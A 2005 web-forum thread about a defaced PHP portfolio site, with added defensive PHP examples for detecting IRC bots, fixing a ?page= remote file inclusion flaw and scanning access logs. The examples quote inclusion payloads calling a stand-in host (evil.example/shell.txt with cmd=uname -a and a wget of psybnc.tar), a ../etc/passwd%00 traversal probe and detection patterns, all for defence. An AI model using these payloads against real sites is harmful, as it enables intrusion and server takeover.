10-02-2005, 07:55 PM
WebProWorld Veteran | Join Date: Aug 2003 | Location: Columbus, Ohio | Posts: 487

My Site has been HACKED!
My personal portfolio site (http://www.richknitter.com) has been hacked. I will leave the hacked page up until tomorrow afternoon. Until that time I would like someone to help me find out who this hacker is and how I can prosecute.
Thank you,
Rich

10-02-2005, 08:59 PM
WebProWorld Member | Join Date: Jul 2005 | Posts: 72

Well, that's like trying to find a needle in a haystack. Unless you're some big company with big financial losses, normally the government doesn't care about small cases like defacing, etc.
I'd hire someone to beef up your security. My guess is that they got through one of your forms. Check site stats, google the information the hacker left lying around on your webpage, look at the whois on the domain name in the email address he left, report to their ISP. Basically all you can do.
Unless of course you have the funds and time to track this person down, then go for it.

10-02-2005, 09:34 PM
WebProWorld Pro | Join Date: Sep 2005 | Location: Greenville, SC | Posts: 214

"Sorry I hack you"? The guy doesn't speak English very well. He's likely not from a country where they would deport him or allow prosecution. Just make sure you're running the newest versions of any software on your site and patches for the OS and server software. It's likely that you were not targeted for it, but that your site came up on a scan for a particular vulnerability. Probably an initiation into the IRC group that is mentioned on the page or just plain bragging rights for them. I understand the frustration, but don't waste your time/money on it unless you're very well off, because it's likely that nothing will come of it.
NV

10-02-2005, 10:44 PM
WebProWorld 1,000+ Club | Join Date: Dec 2003 | Location: Toronto, Ontario, Canada | Posts: 2,217

Well...the good news is that the individual in question dropped you a clue. The bad news is that it's not all that much of a clue.
nullvariable is correct. It appears that whoever decided to do this to you runs an IRC (Internet Relay Chat, for the uninitiated) channel called #carderx, on a network called DALnet.
Now...for them to even know about your site, it usually means that you use IRC and somehow pissed off the wrong people. And they decided to act on it. One thing about IRC is that one does run into the odd script kiddie/hacker/phreaker/general all-around net scum. And quite often, these guys are very, very good at what they do.
Mind you, they usually try the DDoS route first. This is a little unusual, by IRC hacker standards.
Having said all of that, here's what I'd do:
- Change all admin/FTP logins and passwords first and foremost.
- Get your host to move the site onto a different server, or at the very least get a different IP address for it.
- As nullvariable said, make sure the server is up-to-date/patched/etc.
- Log EVERYTHING you can. FTP, raw logs, everything. Sometimes, you'll get something you can track.
Mind you, as nullvariable pointed out, "Sorry I Hack You" is broken English at best, and likely means you're dealing with someone from a country where prosecution of this sort of thing is...well...not high.

10-03-2005, 02:01 AM
WebProWorld Veteran | Join Date: Aug 2003 | Location: Columbus, Ohio | Posts: 487

hmmm...
Thanks for the tips. I don't use IRC and am pretty sure this is random.
I just want to know how they did it now so I can protect myself. If anyone can see a vulnerability please e-mail me and let me know.
Thanks,
Rich

10-03-2005, 02:06 AM
WebProWorld Veteran | Join Date: Aug 2003 | Location: Columbus, Ohio | Posts: 487

There are some new files on my server I just found:
ps.tar.gz
psybnc.tar
kinabot.tar.bz2
Any idea what these are?
Rich

10-03-2005, 07:27 AM
WebProWorld Veteran | Join Date: Jun 2004 | Location: Suffolk, England | Posts: 790

ps.tar.gz = PostScript, tarred and gzipped
psybnc.tar = A bnc is short for a 'bouncer.' A bnc acts as a proxy for IRC, allowing you to hide your real IP address and use a vhost. psyBNC is an IRC tool which can be installed on a shell.
kinabot.tar.bz2 makes it look like it may have something to do with these guys:
http://users.cjb.net/kasuscomp/index.html

10-03-2005, 09:46 AM
WebProWorld 1,000+ Club | Join Date: Dec 2003 | Location: Toronto, Ontario, Canada | Posts: 2,217

I don't think you'll ever find out. That's the problem.
The best thing you can do is not worry about the "how did they do it?" question, but "what are the security measures I can take to prevent this and any other problems?"
Have you talked to GoDaddy about it, since I believe it's them that hosted your site? They should deal with it. If not, move to a different host.
I actually had this happen to a client's site about 5 years ago when they were still hosted on (blech!) Interland. Interland installed something called "Hosting Controller" that had a known vulnerability. When I was able to isolate the hack attempt to this particular vulnerability and they refused to fix it, my client had no choice but to move their files to a different host. That may ultimately be your solution.

10-03-2005, 01:32 PM
WebProWorld Veteran | Join Date: Aug 2003 | Location: Columbus, Ohio | Posts: 487

I contacted GoDaddy... No response yet. I hope they deal with this or I will move hosts.
Thanks for the advice,
p.s. Munkey, thanks for the leads on those files.
Rich

10-03-2005, 05:47 PM
WebProWorld Pro | Join Date: Sep 2005 | Location: Greenville, SC | Posts: 214

Originally Posted by richkoi:
    There are some new files on my server I just found:
    ps.tar.gz
    psybnc.tar
    kinabot.tar.bz2
    Any idea what these are?
    Rich

They are IRC related. They were likely using your server as a relay point to launch DDoS attacks, load bots into channels or mask their IP address. You will most definitely want to change your IP address! You could see residual attacks against that IP for quite a while. IPs with stuff like that get stuck in lists that get passed around for quite some time. Trust me, you don't want to be anywhere near that server if you can avoid it!
You may wonder how I know this :) Let's just say a few years ago I was on the other side of the ball :) But since then I grew up :D (well, mostly). I still hang out on IRC some, so I am familiar with some of the stuff that goes on there.
You'll also want to check for any illegal files, as many times hacked servers are used to serve movies and such through IRC. Take a quick look at the processes running on the system if you have shell access (ps -A) and also run a netstat -tpa. That will let you see what ports are open and what programs are listening or connecting to them. These are Linux commands, BTW; try http://sysinternals.com/ for a good site to find utilities for Windows information. This utility will provide the same information on Windows: http://www.sysinternals.com/Utilities/TcpView.html
Look for programs that are connecting to ports 6667, 6668, 6669, 7000, as that's where IRC servers are located normally.
If your host is any good they can do the above checks for you :)
Hope this helps,
NV
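
NV's checks above, as an added example that is not from the thread: a small PHP command-line script that applies them to `netstat -tpan` output. It reads the netstat text (by default a sample constructed for this example, standing in for the real command), keeps the TCP lines, and flags any socket whose local or remote port is one of the IRC ports NV lists (6667, 6668, 6669, 7000), plus any listening socket owned by a program that is not in a short list of daemons you expect on the box, since a bouncer like psyBNC listens on whatever port it was built with rather than on an IRC port. The 10.0.0.5 host, the remote addresses and the psybnc/kinabot process names in the sample are invented; PHP 7.1 or later is assumed.

```php
<?php
// Added example (not from the thread): apply NV's netstat check automatically.
// Constructed `netstat -tpan` output. The 10.0.0.5 host, the remote addresses
// (documentation ranges) and the psybnc/kinabot processes are invented.
$sampleNetstat = <<<'TXT'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1042/httpd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1007/sshd
tcp        0      0 0.0.0.0:31337           0.0.0.0:*               LISTEN      2811/psybnc
tcp        0      0 10.0.0.5:42117          203.0.113.9:6667        ESTABLISHED 2811/psybnc
tcp        0      0 10.0.0.5:42120          198.51.100.4:7000       ESTABLISHED 2830/kinabot
tcp        0      0 10.0.0.5:22             192.0.2.17:51022        ESTABLISHED 1007/sshd
TXT;

// The ports NV lists as the usual IRC server ports.
const IRC_PORTS = [6667, 6668, 6669, 7000];

/**
 * Parse `netstat -tpan` text and return the TCP sockets worth a second look:
 * anything talking to an IRC port, plus any LISTEN socket owned by a program
 * that is not in the list of daemons you expect on the box.
 */
function find_suspect_sockets(string $netstat, array $expectedDaemons): array
{
    $hits = [];
    foreach (preg_split('/\R/', $netstat) as $line) {
        // Columns: proto recv-q send-q local remote state pid/program
        if (!preg_match('/^(tcp6?)\s+\d+\s+\d+\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\/(\S+)$/', $line, $m)) {
            continue; // header lines, udp, or sockets whose owner netstat could not show
        }
        [, $proto, $local, $remote, $state, $pid, $program] = $m;
        $localPort  = (int) substr(strrchr($local, ':'), 1);
        $remotePort = (int) substr(strrchr($remote, ':'), 1); // "*" becomes 0

        $reasons = [];
        if (in_array($localPort, IRC_PORTS, true) || in_array($remotePort, IRC_PORTS, true)) {
            $reasons[] = 'irc-port';
        }
        if ($state === 'LISTEN' && !in_array($program, $expectedDaemons, true)) {
            $reasons[] = 'unexpected-listener'; // a bouncer listens on whatever port it was built with
        }
        if ($reasons !== []) {
            $hits[] = compact('proto', 'local', 'remote', 'state', 'pid', 'program', 'reasons');
        }
    }
    return $hits;
}

// Live use: `netstat -tpan 2>/dev/null | php irc_check.php -`; with no argument the sample runs.
$input = (PHP_SAPI === 'cli' && ($argv[1] ?? '') === '-') ? stream_get_contents(STDIN) : $sampleNetstat;
foreach (find_suspect_sockets($input, ['httpd', 'sshd']) as $h) {
    printf("%-4s %-22s -> %-22s %-11s pid %-5s %-8s [%s]\n",
        $h['proto'], $h['local'], $h['remote'], $h['state'], $h['pid'], $h['program'],
        implode(',', $h['reasons']));
}
```

On the sample this reports three sockets: the psybnc listener on 31337 (unexpected listener), the psybnc connection to port 6667 and the kinabot connection to port 7000 (IRC ports). Run it as root on the suspect host, since netstat only shows the owning PID for processes you own, and match the PIDs it prints against `ps -A`. netstat output differs slightly between versions, so confirm the regular expression matches your columns before trusting an empty result; on Windows, TcpView shows the same information.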

10-04-2005, 04:10 PM
WebProWorld Veteran | Join Date: Aug 2003 | Location: Columbus, Ohio | Posts: 487

No word from GoDaddy yet. It's been 48 hours. I changed my passwords and CHMODed the FTP folders (what's standard? I just set the ADMIN to full permission and the guests and users to read/execute)
I moved the hacked site here:
http://www.richknitter.com/HACKED/
Rich

10-05-2005, 08:45 PM
WebProWorld Veteran | Join Date: Aug 2003 | Location: Columbus, Ohio | Posts: 487

Hacked again... same guy.
GoDaddy is not being very helpful.
I did get one piece of information that I would like help on. Apparently there is a flaw in my PHP coding that is letting the hacker through. I am brand new at PHP and would like to know if anyone sees a flaw in the way I have coded it. I can send you any PHP file you need, just let me know.
Thank you,
Rich

10-06-2005, 04:38 AM
WebProWorld Veteran | Join Date: Jun 2004 | Location: Suffolk, England | Posts: 790

I don't see how that is possible. The only way I think that could happen is through a form, but then that would also mean that GoDaddy doesn't have the necessary security installed to prevent intrusion. I would recommend moving to better hosting.

10-06-2005, 09:12 AM
WebProWorld 1,000+ Club | Join Date: Dec 2003 | Location: Toronto, Ontario, Canada | Posts: 2,217

I don't see it either, although I don't know PHP.
Does GoDaddy have any third-party programs or scripts installed? That's usually how they get in.

10-06-2005, 10:54 AM
WebProWorld Veteran | Join Date: Aug 2003 | Location: Columbus, Ohio | Posts: 487

The hackers slipped up and forgot to block their IP. I won't post it here, but I will post the referring link:
http://www.richknitter.com/index.php...cmd=uname%20-a
They seem to be injecting their code by taking advantage of my ?page= variable. Anyone who knows PHP know of a way to keep them from doing this?
Thanks,
Rich

10-06-2005, 01:12 PM
WebProWorld Veteran | Join Date: Aug 2003 | Location: Columbus, Ohio | Posts: 487

It is my ?page= variable that was allowing them in.
I guess I'll have to change that so no remote sites can be plugged into that variable.
Rich
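
The flaw Rich describes, an include driven by the `?page=` parameter, as an added PHP example that is not Rich's actual code (which is not in the thread). The first function shows the vulnerable shape: a request such as `/index.php?page=http://evil.example/shell.txt?&cmd=uname%20-a` makes `include()` fetch the attacker's file over HTTP (PHP's `allow_url_fopen` was on by default at the time), and the fetched script runs the `cmd` value with the web server's privileges; with remote fetching off, the same parameter still reads local files through `../` traversal. The hardened version resolves the parameter against a fixed allowlist so that no request data ever reaches `include()`. The page names, the `pages/` directory and `evil.example` are assumptions; PHP 7.1 or later is assumed.

```php
<?php
// Added example, not the site's real code (which is not in the thread).

// VULNERABLE: the request decides what gets included.
// Request: /index.php?page=http://evil.example/shell.txt?&cmd=uname%20-a
//   $page = "http://evil.example/shell.txt?"  ->  include("http://evil.example/shell.txt?.php")
// The trailing "?" turns the appended ".php" into a query string, so with
// allow_url_fopen on PHP downloads shell.txt and executes it; that script then
// reads $_GET['cmd'] and runs `uname -a` as the web server user.
// Even with remote fetching off, ?page=../../../../etc/passwd%00 reads local files.
function render_page_vulnerable(array $get): void
{
    $page = $get['page'] ?? 'home';
    include $page . '.php';          // user-controlled path reaches include()
}

// HARDENED: the parameter is only ever a key into a fixed table; the path that
// reaches include() never contains request data. The page names are assumed.
const PAGES = [
    'home'      => 'pages/home.php',
    'portfolio' => 'pages/portfolio.php',
    'contact'   => 'pages/contact.php',
];

function resolve_page($requested): string
{
    // ?page[]=x arrives as an array; anything that is not an exact known key falls back to home.
    if (is_string($requested) && array_key_exists($requested, PAGES)) {
        return PAGES[$requested];
    }
    return PAGES['home']; // or send a 404; never echo $requested back unescaped
}

function render_page_safe(array $get): void
{
    include __DIR__ . '/' . resolve_page($get['page'] ?? null);
}

// Demo of how each request value resolves (nothing is included here).
$probes = [
    'portfolio',
    'http://evil.example/shell.txt?',
    '../../../../etc/passwd',
    "home\0",          // null-byte truncation trick; fails the exact-key match
    ['x'],             // ?page[]=x
];
foreach ($probes as $p) {
    printf("%-34s -> %s\n", is_string($p) ? addcslashes($p, "\0") : 'array', resolve_page($p));
}
```

Only `portfolio` resolves to its own file; every other probe falls back to `pages/home.php`. Beyond the code, set `allow_url_fopen = Off` in php.ini unless something genuinely needs it (later PHP versions split the include case out as `allow_url_include`, which should also be off), use `open_basedir` to confine what the script can read, and audit every `include`/`require` in the site to confirm its argument cannot be influenced by `$_GET`, `$_POST`, `$_REQUEST` or `$_COOKIE`, following each variable back to where it is assigned.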

10-06-2005, 01:18 PM
WebProWorld Member | Join Date: Jul 2005 | Posts: 72

If you send me your code, I can test it out for you on my machine. I suspect they are using JavaScript to manipulate where the form is submitting to and how it submits, or they are using the form itself.
nerdbyte

10-06-2005, 05:08 PM
WebProWorld Veteran | Join Date: Aug 2003 | Location: Columbus, Ohio | Posts: 487

I shut down the site, collected IP addresses (all the hackers are from Indochina) and am pursuing my legal options. I found out where one of the guys works, so I may be able to get in contact with his boss and let him know what his employee has been up to during the work day (that is assuming that the boss knows English).
I am fixing my code so hackers can not inject code into my site any longer.
Thanks for everyone's help,
Rich

10-06-2005, 09:29 PM
WebProWorld 1,000+ Club | Join Date: Dec 2003 | Location: Toronto, Ontario, Canada | Posts: 2,217

Good luck, richkoi.
Indochina is one of those areas (pretty much all of Southeast Asia is) where stuff like this is pretty common and not often enforced. :(

10-10-2005, 12:00 PM
WebProWorld Veteran | Join Date: Aug 2003 | Location: Columbus, Ohio | Posts: 487

MOD: Please remove the links I posted in this topic.
Thank you,
Rich

10-12-2005, 10:21 AM
WebProWorld New Member | Join Date: Oct 2005 | Posts: 14

You can try and stick it to them however you possibly can.
If you have a website from them, contact their webhost AND domain registrar and have them deleted/banned.
If you have their originating IP, contact their ISP and have their account terminated.
***This includes his boss' ISP - That is guaranteed to get his boss pissed at him if a direct call to his boss doesn't.
Informing the webhost, domain registrar, and ISP has been very effective (and FREE) for me in the past. Just be sure to include your access logs for proof, and something is usually done about it.
Chris
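
Rich found the attacker from the referring link, and Chris advises attaching the access logs as proof. As an added example that is not from the thread, this PHP script pulls the inclusion attempts out of an Apache combined-format access log and groups the raw lines by client address, ready to attach to an abuse report. A request is flagged when any query parameter value is an `http://`, `https://` or `ftp://` URL, contains `../` or a null byte, or is named `cmd`. The sample lines are constructed for this example: the addresses come from the documentation ranges and `evil.example` is invented; PHP 7.1 or later is assumed.

```php
<?php
// Added example (not from the thread): pull inclusion attempts out of an Apache
// combined-format access log and group them by source address.
// Constructed sample lines; addresses are from the documentation ranges and
// evil.example is invented.
$sampleLog = <<<'LOG'
192.0.2.44 - - [06/Oct/2005:10:41:03 -0400] "GET /index.php?page=http://evil.example/shell.txt?&cmd=uname%20-a HTTP/1.1" 200 1822 "-" "Mozilla/4.0"
192.0.2.44 - - [06/Oct/2005:10:41:09 -0400] "GET /index.php?page=http://evil.example/shell.txt?&cmd=wget%20http://evil.example/psybnc.tar HTTP/1.1" 200 1822 "-" "Mozilla/4.0"
198.51.100.7 - - [06/Oct/2005:10:42:15 -0400] "GET /index.php?page=portfolio HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [06/Oct/2005:10:43:51 -0400] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 905 "-" "libwww-perl/5.79"
198.51.100.7 - - [06/Oct/2005:10:44:02 -0400] "GET /images/logo.gif HTTP/1.1" 200 3210 "http://www.example.com/index.php?page=portfolio" "Mozilla/5.0"
LOG;

/** True when any query parameter looks like a remote/local file inclusion or a shell command channel. */
function is_inclusion_attempt(string $query): bool
{
    parse_str($query, $params); // percent-decodes the values (%20, %00 ...)
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue; // page[]=x style arrays
        }
        if (preg_match('#^(https?|ftp)://#i', $value)) {
            return true; // remote file handed to include()
        }
        if (strpos($value, '../') !== false || strpos($value, "\0") !== false) {
            return true; // directory traversal / null-byte truncation
        }
        if (strcasecmp((string) $name, 'cmd') === 0) {
            return true; // command parameter used by the common PHP shells
        }
    }
    return false;
}

/** Returns [ip => [matching raw log lines]] for the requests that look like attacks. */
function scan_access_log(string $log): array
{
    $byIp = [];
    foreach (preg_split('/\R/', $log) as $line) {
        // client ip ... [timestamp] "METHOD target PROTOCOL"
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"/', $line, $m)) {
            continue;
        }
        [, $ip, $target] = $m;
        $q = strpos($target, '?');
        $query = $q === false ? '' : substr($target, $q + 1);
        if ($query !== '' && is_inclusion_attempt($query)) {
            $byIp[$ip][] = $line;
        }
    }
    return $byIp;
}

// Live use: `php find_rfi.php - < access_log`; with no argument the sample is scanned.
$input = (PHP_SAPI === 'cli' && ($argv[1] ?? '') === '-') ? stream_get_contents(STDIN) : $sampleLog;
foreach (scan_access_log($input) as $ip => $lines) {
    printf("== %s: %d request(s)\n", $ip, count($lines));
    foreach ($lines as $l) {
        echo "   $l\n";
    }
}
```

On the sample this groups two requests under 192.0.2.44 and one under 203.0.113.9; the ordinary `page=portfolio` request and the image fetch whose referer merely mentions the page parameter are left alone. Send the grouped lines, together with the log's timezone, to the abuse contacts that `whois` returns for each address. The `cmd` rule is deliberately broad, so check the hits by eye: a legitimate form field could carry that name.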

10-12-2005, 10:17 PM
WebProWorld Veteran | Join Date: Aug 2003 | Location: Columbus, Ohio | Posts: 487